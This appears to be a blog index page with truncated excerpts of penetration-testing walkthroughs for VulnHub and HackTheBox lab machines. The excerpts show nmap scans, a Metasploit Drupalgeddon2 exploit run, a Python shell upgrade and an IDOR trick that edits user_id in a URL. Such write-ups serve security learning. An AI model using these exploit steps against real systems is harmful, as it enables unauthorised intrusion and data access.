VULNHUB

AI WEB (VULNHUB)

root@kali:~/Downloads# nmap -A 192.168.65.158 Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-31 17:25 GMT WARNING: RST from 192.168.65.158 port 80 — is this port really open? WARNING: RST from 192.168.65.158 port 80 — is this port really open? WARNING: RST from 192.168.65.158 port 80 — is this port really open? WARNING: RST from 192.168.65.158 port […]

VULNHUB

Lampiao_1 (VULNHUB)

VM LINK : https://download.vulnhub.com/lampiao/Lampiao.zip root@kali:~# nmap -p- -A 192.168.1.105 port : 22 , 80 , 1898 now on browser http://192.168.1.103:1898 now on terminal msf > user explot/unix/webapp/drupal_drupalgeddon2 msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.105 msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898 msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit meterpreter > shell python -c ‘import pty;pty.spawn(“/bin/bash”)’ www-data@lampiao:$ lsb_release -a www-data@lampiao:$ now […]

VULNHUB

Me and My GirlFriend1 (Vulnhub)

VM LINK : https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova root@kali:~/Downloads# nmap -A 192.168.199.130 Now on browser try to access the ip on port 80. Now again try to access http://192.168.199.130 And we can see the x-forward header in request. And we get We have to see the URL ¬†http://192.168.199.130/index.php?page=profile&user_id=12 Try to change User_id=5 (http://192.168.199.130/index.php?page=profile&user_id=5) We get We can get the […]

HACKTHEBOX

Beep (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.7 Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-24 19:06 EST Stats: 0:01:53 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 91.67% done; ETC: 19:08 (0:00:10 remaining) Stats: 0:02:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 91.67% done; ETC: […]